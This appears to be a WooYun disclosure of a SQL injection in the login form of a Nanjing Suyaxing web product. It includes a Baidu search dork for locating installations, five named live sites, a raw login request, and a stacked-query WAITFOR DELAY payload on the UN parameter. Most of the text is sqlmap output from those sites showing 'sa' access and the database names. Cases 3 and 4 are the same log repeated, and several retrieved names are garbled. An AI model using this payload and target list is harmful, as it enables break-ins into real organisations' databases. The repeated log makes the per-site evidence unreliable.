WooYun.org

厂商：南京苏亚星资讯科技开发有限公司
百度关键字 ：帮助 正在读取数据... 注册用户 系统用户 用户名: 密码: 南京苏亚星资讯科技开发
http://www.baidu.com/s?wd=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&pn=50&oq=帮助%20正在读取数据...%20注册用户%20系统用户%20用户名%3A%20密码%3A%20南京苏亚星资讯科技开发&ie=utf-8&rsv_pq=bf3e63ef00016d7a&rsv_t=7c9aDgkEFKzDMR0WdiRIc8zStNMuWUt5eZkDVjpK8DDhOOqWH8Hi&rsv_page=1&f=8&rsv_bp=1&tn=baidu
五个案例证明通用性 登录处UN参数存在漏洞
http://sportingbus.com/
http://fjzhyz.cn/
http://www.scyahyez.com/
http://jwculture.com/
http://183.167.250.28:85/

POST /srp2003/login.asp HTTP/1.1
Host: www.scyahyez.com
Connection: keep-alive
Content-Length: 48
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.scyahyez.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.scyahyez.com/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASPSESSIONIDQSTBBBBQ=KFBFAEIAMHCLPDLNGNJLDONN
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
type=1&ST=Sys&UN=1%27&PW=1&submit1=%B5%C7+%C2%BC

1、Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[16:20:38] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2005
[16:20:38] [INFO] fetching current user
[16:20:39] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[16:21:10] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[16:22:10] [INFO] adjusting time delay to 1 second due to good response times
sa
current user: 'sa'
[16:22:30] [INFO] fetching current database
[16:22:30] [INFO] retrieved: SRP2003
current database: 'SRP2003'
[16:25:18] [INFO] fetching database names
[16:25:18] [INFO] fetching number of databases
[16:25:18] [INFO] retrieved: 6
[16:26:11] [INFO] retrieved: ma
[16:27:17] [ERROR] invalid character detected. retrying..
[16:27:17] [WARNING] increasing time delay to 2 seconds
sterA
[16:30:30] [INFO] retrieved: model
[16:34:48] [INFO] retrieved: msdb
[16:37:53] [INFO] retrieved: SRP2003
[16:43:24] [INFO] retrieved: tempdb
[16:48:40] [INFO] retrieved: Vod2005
available databases [6]:
[*] masterA
[*] model
[*] msdb
[*] SRP2003
[*] tempdb
[*] Vod2005
[16:54:36] [WARNING] HTTP error codes detected during testing:
503 (Service Unavailable) - 2 times
[16:54:36] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\sportingbus.com'
2、Place: POST
Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[07:04:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2000
[07:04:11] [INFO] fetching current user
[07:04:11] [INFO] resumed: sa\x11\t
current user: 'sa'
[07:04:11] [INFO] fetching current database
[07:04:11] [INFO] resumed: SRP2003
current database: 'SRP2003'
[07:04:11] [INFO] fetching database names
[07:04:11] [INFO] fetching number of databases
[07:04:11] [INFO] resumed: 14
[07:04:11] [INFO] resumed: Jupite{5
[07:04:11] [INFO] resumed: m?s?eyI
[07:04:11] [INFO] resumed: Merak
[07:04:11] [INFO] resumed: modexA
[07:04:11] [INFO] resumed: msdb
[07:04:11] [INFO] resumed: No|th?ind\x19!A\x02
[07:04:11] [INFO] resumed: pubs%
[07:04:11] [INFO] resumed: SM2005
[07:04:11] [INFO] resumed: SRP2003
[07:04:11] [INFO] resumed: tempqb
[07:04:11] [INFO] resumed: TempJupiterSa
[07:04:11] [INFO] resumed: vc2003
[07:04:11] [INFO] resumed: Vod2005A
[07:04:11] [INFO] resumed: ys2004
available databases [14]:
[*] [Jupite{5]
[*] [m?s?eyI]
[*] [No|th?ind!A]
[*] [pubs%]
[*] Merak
[*] modexA
[*] msdb
[*] SM2005
[*] SRP2003
[*] TempJupiterSa
[*] tempqb
[*] vc2003
[*] Vod2005A
[*] ys2004
[07:04:11] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\fjzhyz.cn'
3、Place: POST
Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[21:25:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[21:25:41] [INFO] fetching current user
[21:25:41] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[21:27:02] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[21:28:11] [INFO] adjusting time delay to 2 seconds due to good response times
sa
current user: 'sa\x11'
[21:31:00] [INFO] fetching current database
[21:31:00] [INFO] retrieved: S
[21:33:27] [ERROR] invalid character detected. retrying..
[21:33:27] [WARNING] increasing time delay to 3 seconds
RP2003
current database: 'SRP2003'
[21:44:54] [INFO] fetching database names
[21:44:54] [INFO] fetching number of databases
[21:44:54] [INFO] retrieved: 13
[21:47:02] [INFO] retrieved: Jupiter
[22:01:37] [ERROR] invalid character detected. retrying..
[22:01:37] [WARNING] increasing time delay to 4 seconds
5
[22:03:59] [INFO] retrieved: master
[22:17:05] [INFO] retrieved:
[22:19:21] [ERROR] invalid character detected. retrying..
[22:19:21] [WARNING] increasing time delay to 5 seconds
Merak
[22:30:58] [INFO] retrieved: model
[22:45:05] [INFO] retrieved: msdb
[22:55:34] [INFO] retrieved: ReportServer
[23:27:29] [INFO] retrieved: ReportServerT
[00:03:35] [ERROR] invalid character detected. retrying..
[00:03:35] [WARNING] increasing time delay to 6 seconds
[00:05:45] [ERROR] invalid character detected. retrying..
[00:05:45] [WARNING] increasing time delay to 7 seconds
[00:08:08] [ERROR] unable to properly validate last character value ('q')..
qmpDB
[00:14:17] [INFO] retrieved: SM2005
[00:22:58] [INFO] retrieved: SRP200
[00:34:01] [ERROR] invalid character detected. retrying..
[00:34:01] [WARNING] increasing time delay to 3 seconds
[00:53:35] [INFO] retrieved:
[01:13:08] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[01:13:08] [INFO] retrieved:
[01:32:43] [INFO] retrieved:
[01:52:17] [INFO] retrieved:
available databases [9]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTqmpDB
[*] SM2005
[*] SRP200
[02:11:50] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.scyahyez.com'
4、Place: POST
Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[21:25:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[21:25:41] [INFO] fetching current user
[21:25:41] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[21:27:02] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[21:28:11] [INFO] adjusting time delay to 2 seconds due to good response times
sa
current user: 'sa\x11'
[21:31:00] [INFO] fetching current database
[21:31:00] [INFO] retrieved: S
[21:33:27] [ERROR] invalid character detected. retrying..
[21:33:27] [WARNING] increasing time delay to 3 seconds
RP2003
current database: 'SRP2003'
[21:44:54] [INFO] fetching database names
[21:44:54] [INFO] fetching number of databases
[21:44:54] [INFO] retrieved: 13
[21:47:02] [INFO] retrieved: Jupiter
[22:01:37] [ERROR] invalid character detected. retrying..
[22:01:37] [WARNING] increasing time delay to 4 seconds
5
[22:03:59] [INFO] retrieved: master
[22:17:05] [INFO] retrieved:
[22:19:21] [ERROR] invalid character detected. retrying..
[22:19:21] [WARNING] increasing time delay to 5 seconds
Merak
[22:30:58] [INFO] retrieved: model
[22:45:05] [INFO] retrieved: msdb
[22:55:34] [INFO] retrieved: ReportServer
[23:27:29] [INFO] retrieved: ReportServerT
[00:03:35] [ERROR] invalid character detected. retrying..
[00:03:35] [WARNING] increasing time delay to 6 seconds
[00:05:45] [ERROR] invalid character detected. retrying..
[00:05:45] [WARNING] increasing time delay to 7 seconds
[00:08:08] [ERROR] unable to properly validate last character value ('q')..
qmpDB
[00:14:17] [INFO] retrieved: SM2005
[00:22:58] [INFO] retrieved: SRP200
[00:34:01] [ERROR] invalid character detected. retrying..
[00:34:01] [WARNING] increasing time delay to 3 seconds
[00:53:35] [INFO] retrieved:
[01:13:08] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[01:13:08] [INFO] retrieved:
[01:32:43] [INFO] retrieved:
[01:52:17] [INFO] retrieved:
available databases [9]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTqmpDB
[*] SM2005
[*] SRP200
[02:11:50] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.scyahyez.com'
5、Place: POST
Parameter: UN
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: type=1&ST=Sys&UN=1'; WAITFOR DELAY '0:0:5';--&PW=2&submit1=?? ?
---
[22:04:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[22:04:39] [INFO] fetching current user
[22:04:39] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[22:05:59] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[22:07:08] [INFO] adjusting time delay to 2 seconds due to good response times
sa
current user: 'sa'
[22:09:15] [INFO] fetching current database
[22:09:15] [INFO] retrieved: SRP2003
current database: 'SRP2003'
[22:19:29] [INFO] fetching database names
[22:19:29] [INFO] fetching number of databases
[22:19:29] [INFO] retrieved:
[22:19:48] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[22:19:48] [ERROR] unable to retrieve the number of databases
[22:19:48] [INFO] retrieved: SRP2003
[22:30:01] [INFO] retrieved: master
[22:38:36] [INFO] retrieved: tempdb
[22:47:46] [INFO] retrieved: model
[22:55:32] [INFO] retrieved: msdb
[23:01:29] [INFO] retrieved: pubs
[23:07:51] [INFO] retrieved: Northwind
[23:21:52] [INFO] retrieved: SRP2003
[23:32:03] [INFO] retrieved: Vod2005
[23:42:38] [INFO] retrieved: SM2005
[23:51:12] [INFO] retrieved: Merak
[23:57:58] [INFO] retrieved: ws2004
[00:07:20] [INFO] retrieved: vc2003
[00:16:35] [INFO] retrieved: Jup
[00:22:13] [ERROR] invalid character detected. retrying..
[00:22:13] [WARNING] increasing time delay to 3 seconds
iter5
[00:31:12] [INFO] retrieved:
[00:32:25] [ERROR] invalid character detected. retrying..
[00:32:25] [WARNING] increasing time delay to 4 seconds
TempJupiterSa
[01:00:50] [INFO] retrieved:
available databases [15]:
[*] Jupiter5
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] vc2003
[*] Vod2005
[*] ws2004
[01:03:58] [WARNING] HTTP error codes detected during testing:
503 (Service Unavailable) - 4 times
[01:03:58] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\183.167.250.28'